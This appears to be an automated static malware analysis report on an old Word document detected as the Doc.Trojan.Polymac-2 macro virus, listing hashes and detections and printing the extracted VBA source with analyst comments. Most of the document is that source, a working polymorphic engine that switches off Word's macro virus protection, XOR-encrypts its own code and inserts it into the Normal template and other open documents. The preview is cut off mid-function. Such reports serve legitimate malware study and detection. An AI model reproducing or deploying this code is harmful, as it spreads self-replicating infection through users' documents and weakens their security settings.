Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7ee513fc42c9fc83…

MALICIOUS

Office (OLE)

93.5 KB Created: 1999-11-06 14:31:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ac7de3cfa11183fc93d458437878ae4d SHA-1: 263984c77beac102a983620450bd5cf1f5fd1ed6 SHA-256: 7ee513fc42c9fc83a66f0ace992726e4f9b07ce67c4ba61545b8e6d705da455d
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with multiple critical detections, including 'Doc.Trojan.Polymac-2' and 'Win.Trojan.C-286' on an extracted artifact. It contains a VBA macro that runs when the document is closed (Document_Close); the macro XOR-encodes its own module source with a random keystream, wraps the encoded body and a generated decryptor in a Document_Open procedure, and inserts that code into the Normal template and every other open document whose first code module is empty, suggesting a self-propagation mechanism for payload delivery. The macro's complexity and self-modification routines indicate a sophisticated downloader or dropper.

Heuristics 3

  • ClamAV: Doc.Trojan.Polymac-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Polymac-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro (the text "Private Sub Document_Open()" is built at runtime and written into other documents; the entry point visible in the extracted source is Document_Close)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60457 bytes
SHA-256: 955f24cb1cf791a9422b871e78b9e414f6530fba1d44cd074d9dcf3e9320a962
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point: fires on document close (not open). Encodes this document's
' own macro module with a random XOR keystream (compile), turns the result
' into a new Document_Open procedure (insertToText), and writes that procedure
' into the Normal template and into every other open document whose first
' code module is still empty. Indicators worth alerting on: Options.VirusProtection
' set to False and NormalTemplate.VBProject modified from a close event.
Private Sub Document_Close()
 Randomize
 ' Random identifier used as the string-variable name in the generated code (see getname).
 CrStr = getname()
 ' Clears the file attributes (0) of the template file; presumably to drop read-only
 ' so it can be saved back — confirm what NormalTemplate's default property yields here.
 SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
 'Permutation PolyMac
 'Macros used MacroCryptedPolymorphicRealisticAntiheuristicCodeEngine
 'by CyberShadow v2.0
 'No ideas to new versions :(
 ' Keep the work invisible: no screen refresh, VB editor kept closed.
 With Application
  .EnableCancelKey = True
  .ScreenUpdating = False
  .ShowVisualBasicEditor = False
 End With
 ' Suppress save/conversion prompts and switch off Word's macro virus warning.
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
 ' compile: reads the active document's module source and XOR-encodes it into a
 ' VBA string expression; r11/r21/r23 receive the random key bytes the decryptor needs.
 Call compile(CryptedString, r11, r21, r23, CrStr)
 ' NOTE(review): "CrypteS" is not the "CryptedS" used below (likely a typo), so this
 ' line initialises an unrelated variable and CryptedS is still unset at the next call.
 CrypteS = ""
 ' Builds CryptedS (line-split encoded body + decryptor) and ProceduresCounter
 ' (extra text appended after End Sub; produced in PermuteCryptedBody, outside this preview).
 Call insertToText(CryptedString, r11, r21, r23, CrStr, CryptedS, ProceduresCounter)
 ' Wrap the generated body in a Document_Open procedure, CR+LF line endings.
 CryptedS = "Private Sub Document_Open()" + Chr$(13) + Chr$(10) + CryptedS
 CryptedS = CryptedS + Chr$(13) + Chr$(10) + "End Sub" + Chr$(13) + Chr$(10) + ProceduresCounter
 ' Infect the Normal template: only when its first code module is empty.
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 If NT.lines(1, 1) = "" Then NT.Insertlines 1, CryptedS
 ' Infect every other open document the same way, then return to the original document.
 If Documents.Count > 1 Then
  aff = ActiveDocument
  For Each aDoc In Documents
   If aDoc.Name <> aff Then
    Documents(aDoc.Name).Activate
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If AD.lines(1, 1) = "" Then AD.Insertlines 1, CryptedS
   End If
  Next
  If ActiveDocument.Name <> aff Then Documents(aff).Activate
 End If
 Application.ScreenUpdating = True
End Sub
' Returns a random identifier: 1 to 7 ASCII letters, each independently
' upper- or lower-cased, followed by one digit in 0..8. Used for the
' variable names in the generated code so every copy looks different.
Private Function getname()
 c = ""
 ' Int(Rnd * 7) + 1 iterations, i.e. 1..7 letters.
 For i = 1 To Int(Rnd * 7) + 1
  ' 65..90 = "A".."Z"
  b = Int(Rnd * 26) + 65
  ' +32 shifts to lower case roughly half the time.
  If Rnd > 0.5 Then b = b + 32
  c = c + Chr$(b)
 Next
 ' Trailing digit: Asc("0") + 0..8.
 c = c + Chr$(Asc("0") + Int(Rnd * 9))
 getname = c
End Function
' Reads the active document's entire first code module and rebuilds it as a
' single VBA string expression of the form  <CrStr>="..."+chr$( n) "..."...
' whose characters are XOR-encoded with a keystream derived from three random
' bytes. The initial key bytes are passed back through r11/r21/r23 so the
' generated decryptor can regenerate the same stream. Nothing is compiled;
' the name is the author's.
Private Sub compile(CryptedString, r11, r21, r23, CrStr)
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 ' a = the whole module source, first line through the last.
 a = AD.lines(1, AD.countoflines)
 CryptedString = CrStr + "="
 ' fl = 1 while a quoted string literal is currently open in the output.
 fl = 0
 ' Three random key bytes in 0..254, copied out unchanged for the decryptor.
 r1 = Int(Rnd * 255)
 r2 = Int(Rnd * 255)
 r3 = Int(Rnd * 255)
 r11 = r1: r21 = r2: r23 = r3
 For i = 1 To Len(a)
  b = Asc(Mid$(a, i, 1))
  ' Keystream step: each key byte is refreshed from the others, mod 255.
  r1 = (r1 + r2) Mod 255
  r2 = (r1 + r3) Mod 255
  r3 = (r2 + r1) Mod 255
  b = b Xor r3
  ' Control characters, the quote, "+", "_" and "^" are not placed inside a
  ' literal: the quote would end it and "+" is the split marker CorrectLine
  ' relies on (the others presumably for similar reasons). They are emitted
  ' as separate +chr$( n) terms instead.
  If (b < 33) Or b = Asc("""") Or b = Asc("+") Or b = Asc("_") Or b = Asc("^") Then
    ' Close the open literal before appending the chr$() term.
    If fl = 1 Then CryptedString = CryptedString + """"
    CryptedString = CryptedString + "+chr$(" + Str$(b) + ") ": fl = 0
   Else
    If fl = 0 Then
     ' Open a new literal; prefix "+" when the previous term was a chr$() call
     ' (those end in ") ", hence the look at the second-to-last character).
     If Mid$(CryptedString, Len(CryptedString) - 1, 1) = ")" Then CryptedString = CryptedString + "+"
     CryptedString = CryptedString + """"
    End If
    CryptedString = CryptedString + Chr$(b): fl = 1
  End If
 Next
 ' Close the trailing literal unless the expression already ended on a chr$() term.
 If Mid$(CryptedString, Len(CryptedString) - 1, 1) <> " " And Mid$(CryptedString, Len(CryptedString) - 1, 1) <> ")" Then CryptedString = CryptedString + """"
End Sub
' Turns the encoded expression produced by compile into the final macro text
' CryptedS: CorrectLine splits it into many <CrStr>=<CrStr>+... lines,
' MakingDecryptor appends the decoding routine (it needs the key bytes
' r11/r21/r23 and returns the generated variable list in myVars), and
' PermuteCryptedBody — defined past the end of this preview, presumably the
' polymorphic permutation step — finishes CryptedS and fills ProceduresCounter.
Private Sub insertToText(CryptedString, r11, r21, r23, CrStr, CryptedS, ProceduresCounter)
 Call CorrectLine(CryptedString, CrStr, CryptedS)
 Call MakingDecryptor(r11, r21, r23, CrStr, CryptedS, myVars)
 Call PermuteCryptedBody(CryptedS, myVars, ProceduresCounter)
End Sub
' Splits the one long expression in CryptedString into several source lines
' (<CrStr>=..., then <CrStr>=<CrStr>+"..." or <CrStr>=<CrStr>...) of roughly
' maxlen characters each, appending them to CryptedS with CR+LF. maxlen is
' redrawn at random (100..199) after every split, so the line layout of each
' generated copy differs.
Private Sub CorrectLine(CryptedString, CrStr, CryptedS)
 maxlen = Int(Rnd * 100) + 100
 ' c = line being built, l = its length, f2 = -1 outside / 1 inside a string literal.
 c = "": l = 0: f2 = -1
 For i = 1 To Len(CryptedString)
  b = Mid$(CryptedString, i, 1)
  ' Every quote toggles the in-literal flag.
  If b = """" Then f2 = -f2
  ' Over length while inside a literal: close it, flush the line, and reopen
  ' the literal on a fresh <CrStr>=<CrStr>+" line.
  If l > maxlen And f2 = 1 Then
   c = c + """"
   CryptedS = CryptedS + c + Chr$(13) + Chr$(10)
   maxlen = Int(Rnd * 100) + 100
   c = CrStr + "=" + CrStr + "+""": l = Len(c)
  End If
  ' Long enough and at a "+" term boundary: flush and continue on a fresh
  ' <CrStr>=<CrStr> line. ("+" never appears inside a literal; compile emits it as chr$().)
  If b = "+" And l >= maxlen Then
   CryptedS = CryptedS + c + Chr$(13) + Chr$(10)
   maxlen = Int(Rnd * 100) + 100
   c = CrStr + "=" + CrStr: l = Len(c)
  End If
  c = c + b: l = l + 1
 Next
 ' Flush the final partial line.
 CryptedS = CryptedS + c + Chr$(13) + Chr$(10)
End Sub
Private Sub MakingDecryptor(r11, r21, r23, CrStr, CryptedS, myVars)
 VarCount = 8
 ReDim a(VarCount)
 myVars = "(" + CrStr
 For i = 1 To VarCount
  Do
   a1 = 0
   a(i) = getname()
   For j = 1 To i - 1
    If a(i) = a(j) Then a1 = 1
   Next
  Loop While
... (truncated)